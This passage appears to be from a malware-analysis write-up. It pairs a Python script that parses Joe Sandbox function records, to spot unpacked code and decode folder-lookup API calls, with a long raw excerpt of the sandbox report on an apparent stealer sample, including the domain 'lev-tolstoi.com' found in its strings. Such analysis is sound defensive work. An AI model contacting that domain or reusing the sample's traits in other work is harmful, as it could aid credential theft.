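# Constructed input: a subset of the function records from the report above,
# keeping only the lines this script reads. Hashes, addresses and API
# references are copied from the report; nothing here is invented.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
• Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
• Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
• Instruction ID: 71bcb16d34c2afef8497121d6b07e83acbbc8df18cf3bd58003839770b83cb46
• Instruction Fuzzy Hash: B0B1D57510C3818EE369CF29C4D07ABBBD2AFD6314F188A6ED4D98B391DB748549C722
APIs
• GetCurrentProcessId.KERNEL32 ref: 02498A1B
• GetCurrentThreadId.KERNEL32 ref: 02498A25
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02498AC2
• GetForegroundWindow.USER32 ref: 02498AD7
  • Part of subcall function 0249BC37: FreeLibrary.KERNEL32(02498BD2), ref: 0249BC3D
  • Part of subcall function 0249BC37: FreeLibrary.KERNEL32 ref: 0249BC5E
• ExitProcess.KERNEL32 ref: 02498BD9
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
• Instruction ID: 3c22db29e3041e4883b340d1e0098570924b4724292bdb834f920f83e432cf9b
• Instruction Fuzzy Hash: F6417C77F4431807D71CAEB9DC9936AB69B9BC4314F0E803F6985AB390DE795C0696C0
"""

# Layout assumed from the rendered report: one "Source File" line per record, IDs as 64 hex chars.
SOURCE_RE = re.compile(r"^Source File: (\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
ID_RE = re.compile(r"^(Opcode ID|Instruction ID): ([0-9a-f]{64})$")
API_RE = re.compile(r"(\w+)\.(\w+)(?:\(([^)]*)\))?,? ref: ([0-9A-Fa-f]+)")
# CSIDL constants from the Windows SDK (shlobj.h); a few that stealers typically resolve.
CSIDL = {0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY",
         0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x26: "CSIDL_PROGRAM_FILES"}


def parse_records(text):
    """One dict per function record; a record ends at its Instruction Fuzzy Hash line."""
    records, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if m := SOURCE_RE.match(line):
            cur.update(dump=m.group(1), base=int(m.group(2), 16), pe_backed=m.group(3) == "true")
        elif m := ID_RE.match(line):
            cur[m.group(1).lower().replace(" ", "_")] = m.group(2)
        elif m := API_RE.search(line):
            cur["apis"].append({"name": m.group(1), "dll": m.group(2), "args": m.group(3) or "",
                                "ref": int(m.group(4), 16), "subcall": line.startswith("Part of subcall")})
        elif line.startswith("Instruction Fuzzy Hash:"):
            records.append(cur)
            cur = {"apis": []}
    return records


def decode_args(api):
    """Decode arguments the report shows in clear; only SHGetSpecialFolderPathW is handled."""
    if api["name"] == "SHGetSpecialFolderPathW" and api["args"].count(",") == 3:
        _hwnd, _path, csidl, create = api["args"].split(",")
        if csidl != "?":
            value = int(csidl, 16)
            return {"csidl": value, "csidl_name": CSIDL.get(value, f"CSIDL_{value:#06x}"),
                    "create": create != "00000000"}
    return {}


def shared_functions(records):
    """Opcode ID -> records, restricted to IDs seen at more than one dump base."""
    by_op = defaultdict(list)
    for r in records:
        if "opcode_id" in r and "base" in r:
            by_op[r["opcode_id"]].append(r)
    return {op: rs for op, rs in by_op.items() if len({r["base"] for r in rs}) > 1}


def unpacked_candidates(records):
    """Opcode IDs present both in the PE image (based on PE: true) and in a region that is
    not PE-backed: the same body in dynamically allocated memory is the footprint of unpacking."""
    return sorted(op for op, rs in shared_functions(records).items()
                  if {r["pe_backed"] for r in rs} == {True, False})


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for op in unpacked_candidates(recs):
        where = ", ".join(f"{r['base']:#x} pe={r['pe_backed']} instr={r['instruction_id'][:8]}"
                          for r in shared_functions(recs)[op])
        print(f"duplicated function {op[:12]}: {where}")
    for r in recs:
        for api in r["apis"]:
            if not api["subcall"]:
                print(f"{r['base']:#x} {api['name']}.{api['dll']} @ {api['ref']:#x} {decode_args(api)}")
```

Grouping on Opcode ID rather than Instruction ID is deliberate: the two copies of the same function carry different Instruction IDs in the report while their Opcode IDs agree, so a rebased or relocated copy still collapses onto one key.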
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: )*$X9{;$r1B
• API String ID: 0-1001561910
• Opcode ID: d1fb90ac78791e94cb888bfb997ed68ee8d3de2ae4c9ad63322004d88f834bfc
• Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
• Opcode Fuzzy Hash: d1fb90ac78791e94cb888bfb997ed68ee8d3de2ae4c9ad63322004d88f834bfc
• Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: -$C\$Iz$[^$de
• API String ID: 0-3020956940
• Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
• Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
• Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
• Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: &'$0c=e$2g1i$<k;m$wy
• API String ID: 0-3335612808
• Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
• Instruction ID: 069069d79d43cb6cf4bea0452027827898fb68567307262ae85d267941b464e6
• Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
• Instruction Fuzzy Hash: 5AD117B56083018BD724DF25C8527ABB7F2EF92319F18996DE4828F3A4F7799401CB52

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction ID: f301dbb6ca1db81a006255d0263494cc57243c56ef61b29d79540b35bb951c58
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66A1D77510C3818EE365CF29C4D07ABBBD2AFD6304F188A6ED4D98B391DB748449C766
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction ID: 362284b3f6d56a0dbaff5ada9fcfbcea297e515e5218d39ffbb8955a1c9c2a62
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FA1D77410C3818EE365CF29C4D07ABBBD2AFD6304F288A6ED4D98B391DB748549C766
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction ID: e34893e954f569520b003ed65eb6b2666269d71f9a66198bcfee89c3a565cd48
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CA1E67410C3818ED325CF29C4D07EBBBD6AFD2304F288A6ED4D98B291DB748449C762
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: BI$ZG$lev-tolstoi.com$3ej$pr
• API String ID: 0-2504283770
• Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction ID: d40615f4737d9136a2fb5e2ea9650c8d22d56d4359be3b3524cf045ddf46b0bc
• Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
• Instruction Fuzzy Hash: 09A1A1B56017818FD728CF29C590A62BFF2EF96314B1995AEC4D68F766D734E802CB10

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: &-$)R_X$[O_[$zusR
• API String ID: 0-3432275560
• Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
• Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
• Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
• Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: &-$)R_X$[O_[$zusR
• API String ID: 0-3432275560
• Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
• Instruction ID: 5d87d7fef0fa45d6488f4942b86123d8a35a87a65476da76f2ddf5fbed33f6bb
• Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
• Instruction Fuzzy Hash: E742177060C3908FD725DF28C86076FBBE1AFA6214F08867EE8E55B392D7358506CB52

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: %(#}$/$/26-$1
• API String ID: 0-261129489
• Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
• Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
• Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
• Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: %(#}$/$/26-$1
• API String ID: 0-261129489
• Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
• Instruction ID: 899687713e310fbb8661edb96a8ced5ba804bd98088320c005652a9a3bbfd9fe
• Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
• Instruction Fuzzy Hash: F0E1F87111D3C18AE765CF29C4517FBBBD6EF92208F18896EC4D987392DB39810AC722

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: "w+y$?TUV$D@YO$^QRW
• API String ID: 0-2418547040
• Opcode ID: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
• Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
• Opcode Fuzzy Hash: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
• Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44

Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: #$$+oQ$?{;}$DF
• API String ID: 0-1090792222
• Opcode ID: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
• Instruction ID: f8f0a3fc3e126b0df0e9da8d66218e0bc810a6f9e0fb1804998ec3192ea1b230
• Opcode Fuzzy Hash: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
• Instruction Fuzzy Hash: 34E102B4E043549FEB10DF28D942B5EBBB0FB86304F1085ADE598AB381D7758946CF86

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
• Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
• Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
• Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
• Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96

Strings
Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: -$C\$Iz$[^
                                                                                                                                                                                                                                                                          • API String ID: 0-2105564891
                                                                                                                                                                                                                                                                          • Opcode ID: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                                          • Instruction ID: 657f3f5a16ec7b1ccab67ace801a5480147cb96520a0ce904ebb7d75cae20789
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F81DCB264C3509FD308CFA9C85185FFBE2EFD1300F59886DE0E58B251D67996068B86
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: T$U$V$k
                                                                                                                                                                                                                                                                          • API String ID: 0-1255220828
                                                                                                                                                                                                                                                                          • Opcode ID: 59490c3d0c457f4f9e70ae9389640b911d80fb55b0c1b22c44bb1761b1145410
                                                                                                                                                                                                                                                                          • Instruction ID: 419b7bd8d768cf5a93220c289582c9eeb00d0d40764b4ee896287773b3a375b3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59490c3d0c457f4f9e70ae9389640b911d80fb55b0c1b22c44bb1761b1145410
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CA1043110C7918BD708CB38985022FBBE25BDA324F1A9B2EE4E6473D2D679C945C74B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: T$U$V$k
                                                                                                                                                                                                                                                                          • API String ID: 0-1255220828
                                                                                                                                                                                                                                                                          • Opcode ID: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                                          • Instruction ID: e51913bc1318b489aaf54f115a6b062beab80a7ab95a7fa668834c0320ba49a0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEA1053910C3908BC3549B3C985422FBBD65BC6328F2A8B2EE5E6473D2D675C585C707
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                                          • String ID: PT$lev-tolstoi.com
                                                                                                                                                                                                                                                                          • API String ID: 3861434553-4016702878
                                                                                                                                                                                                                                                                          • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                                          • String ID: PT$lev-tolstoi.com
                                                                                                                                                                                                                                                                          • API String ID: 3861434553-4016702878
                                                                                                                                                                                                                                                                          • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction ID: eff78ee87d626d3a0da557417c581b5285bdc2136f2726833c12f01c07caa04a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0A1DFB46087918FD726CF39C4A0A62BFE1EF57204B18869EC4D24FB66D339E406CB15
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
